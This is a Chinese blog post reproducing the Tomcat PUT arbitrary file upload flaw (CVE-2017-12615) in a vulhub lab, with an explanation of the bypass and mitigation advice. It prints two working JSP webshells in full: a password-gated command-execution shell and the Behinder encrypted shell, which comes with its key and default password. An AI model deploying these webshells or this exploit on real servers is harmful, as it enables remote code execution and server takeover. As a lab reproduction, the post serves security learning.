Tomcat PUT方法任意写漏洞复现

已于 2023-02-12 11:59:11 修改
阅读量449 收藏 2
点赞数 1
文章标签: 安全
于 2023-02-12 11:58:35 首次发布
原文链接:https://blog.csdn.net/weixin_45744814/article/details/120307656
版权

目录

漏洞介绍

漏洞描述

漏洞等级

漏洞编号

受影响版本

环境部署

设备信息

靶场搭建

漏洞复现

访问主页

测试PUT方法

 测试上传jsp脚本

失败原因

重新上传jsp测试脚本

上传jsp木马-命令执行

上传成功且执行命令

上传冰蝎自带jsp木马

使用冰蝎连接shell.jsp脚本

漏洞防护

声明

漏洞介绍

漏洞描述

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。漏洞的产生是由于配置不当(非默认配置),将配置文件(conf/web.xml)中的readonly设置为了false,导致可以使用PUT方法上传任意文件,但限制了jsp后缀,不过对于不同平台有多种绕过方法

漏洞等级

漏洞编号

CVE-2017-12615

受影响版本

漏洞影响全部的 Tomcat 版本:Apache Tomcat 7.0.0 - 7.0.79 (windows环境)

环境部署

设备信息

靶机:192.168.111.147

攻击机:192.168.111.138

靶场搭建

通过docker搭建的vulhub靶场进行漏洞复现

漏洞复现

 访问主页

测试PUT方法

使用PUT方法上传1.txt文件测试PUT方法能否使用

 测试上传jsp脚本

上传1.jsp脚本失败

失败原因

  1. org.apache.jasper.servlet.JspServlet:默认处理jsp,jspx文件请求,不存在PUT上传逻辑,无法处理PUT请求
  2. org.apache.catalina.servlets.DefaultServlet:默认处理静态文件(除jsp,jspx之外的文件),存在PUT上传处理逻辑,可以处理PUT请求。
  3. 所以我们即使可以PUT一个文件到服务器但也无法直接PUT以jsp,jspx结尾文件,因为这些这些后缀的文件都是交由JspServlet处理的,它没法处理PUT请求。
  4. 但是当我们利用Windows特性以下面两种方式上传文件时,tomcat并不认为其是jsp文件从而交由DefaultServlet处理,从而成功创建jsp文件,这也就是所谓的CVE-2017-12615漏洞。

重新上传jsp测试脚本

上传成功

 上传jsp木马-命令执行

<%
if("666".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>

上传成功且执行命令

上传冰蝎自带jsp木马

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

使用冰蝎连接shell.jsp脚本

默认密码:rebeyond

 漏洞防护

  1. 配置readonly值为True或注释参数,禁止使用PUT方法并重启tomcat。
  2. 通过WAF阻止PUT和DELETE危险请求
  3. 静止用户上传JSP脚本

声明

该博客根据君莫hacker博主博客编写,如有侵权立即删除。

原博客地址:Tomcat put方法任意文件上传漏洞(CVE-2017-12615)复现_君莫hacker的博客-CSDN博客

xiaolihello8
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Tomcat 通过 PUT 方法任意入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1073
CVE-2017-12615 对应的漏洞任意文件入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件 。Tomcat设置了权限(readonly=false),导致可以使用PUT方法上传任意文件。
(CVE-2017-12615)Tomcat PUT方法任意文件上传漏洞
weixin_45253622的博客
03-29 6048
(CVE-2017-12615)Tomcat任意文件上传漏洞 漏洞介绍 在一定条件下,攻击者可以利用漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险。 漏洞条件: 存在漏洞Tomcat运行在Windows主机上,并且启用了HTTP PUT请求方法(例如:将readonly初始化参数由默认值设置为false) 影响版本 Apache Tomca
TomcatPUT的文件上传漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1132
详细教程
Tomcat PUT方法任意文件漏洞(CVE-2017-12615)
最新发布
weixin_45653478的博客
05-02 935
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件任意位置,从而实任意文件入。
TOMCAT PUT方法任意文件(CVE-2017-12615)-靶场
m0_66376444的博客
04-06 581
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。其实tomcat会对上传的文件内容进行限制,比如说禁止上传 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。2、修改请求协议PUT加文件名,在请求主体内入可执行代码,点击发送。本次测试版本:Tomcat版本:8.5.19。
CTF-PUT上传漏洞
不知名白帽的博客
05-27 744
CTF-PUT上传漏洞,实验环境:kali(192.168.20.128),靶机(192.168.20.137)。进行信息探测,漏洞扫描未发有效信息后,测试PUT漏洞,发存在PUT漏洞,下载插件Poster(RESTClient),然后上传大马反弹shell
《WEB安全漏洞30讲》(第5讲)任意文件上传漏洞
午夜安全
05-22 3278
文件上传漏洞,指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这个漏洞其实非常简单,就是攻击者给服务器上传了恶意的木马程序,然后利用此木马程序执行操作系统命令,从而获得服务器权限,造成严重的安全隐患。比如一个JAVA系统本来需要上传身份证图片进行用户实名认证,结果恶意用户上传了jsp木马文件,之后利用这个文件执行系统命令,再以这个系统为据点,对内网其他互通的系统进行攻击,这样将导致整个内网系统的沦陷。
关于Apache Tomcat存在文件包含漏洞的整改方法
01-09
攻击者利用该漏洞,可在未授权的情况下远程读取特定目录下的任意文件。目前,漏洞细节尚未公开,厂商已发布新版本完成漏洞。 一、漏洞情况分析 Tomcat是Apache软件基金会Jakarta 项目中的一个核心项目,作为目前...
tomcat禁止PUT方法
03-29
Tomcat 禁止 PUT方法 Tomcat 是一个流行的 Java Web 服务器和 servlet 容器,它提供了许多强大的功能来管理和部署 Web 应用程序。然而,在某些情况下,我们可能需要禁止 Tomcat 上的某些 HTTP 方法,例如 PUT、...
Tomcat中间件PUT漏洞-任意文件上传漏洞
weixin_46411728的博客
08-11 694
Tomcat中间件PUT任意文件上传漏洞
vulhub靶场-tomcat漏洞
m0_62008601的博客
07-23 1282
tomcat漏洞合集
vulhub tomcat8弱口令的漏洞
weixin_67813445的博客
02-13 159
Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。 tomcat用户名密码使用bash64方式进行加密。
CVE-2017-12615 Tomcat PUT 任意文件上传 漏洞利用教程
凝聚力安全团队
11-14 2140
目录漏洞描述影响版本漏洞环境搭建漏洞检测漏洞利用漏洞加固 漏洞描述   在启用HTTP PUT的Windows上运行Apache Tomcat 7.0.0至7.0.79时(例如,通过将Default的只读初始化参数设置为false),可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP,并且服务器将执行其中包含的所有代码。 影响版本 tomcat 7.0.0至7.0.79 漏洞环境搭建 漏洞检测 漏洞利用 漏洞加固 ...
Tomcat PUT方法任意文件上传(CVE-2017-12615)
谢公子的博客
09-04 5175
目录 漏洞: 漏洞利用工具: 漏洞环境:当 Tomcat运行在Windows操作系统,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求上传任意文件,包括JSP类型的木马。影响范围:Apache Tomcat 7.0.0 - 7.0.81 漏洞: Tomcat版本:Tomcat 7.0.39...
tomcat put方法任意文件漏洞
qq_48744846的博客
04-14 1709
开启容器 抓包 使用put上传jsp文件查看put漏洞是否存在 存在
jetty禁用http put和delete等方法的方式
shuipinglp的专栏
10-30 2086
1. 基于xml的配置方式 <security-constraint> <display-name>Example Security Constraint</display-name> <web-resource-collection> <web-resource-name>...
tomcat服务器漏洞
06-06
为了Tomcat服务器漏洞,你需要先了解Tomcat服务器中存在的漏洞类型及其对应的漏洞代码,然后通过构造特定的http请求来触发漏洞。 以下是一个简单的漏洞步骤: 1. 确认Tomcat的版本和具体漏洞类型,可以通过查询漏洞库或Tomcat官方网站获取相关信息。 2. 构造特定的http请求,利用漏洞触发目标Tomcat服务器上的漏洞。例如,如果目标服务器存在目录遍历漏洞,攻击者可以通过构造的http请求访问受保护的文件或目录。 3. 确认漏洞是否被成功利用,可以通过查看服务器的响应或其他日志信息来判断漏洞是否被成功利用。 需要注意的是,漏洞过程中需要遵循合法、合规的原则,不得进行非法攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值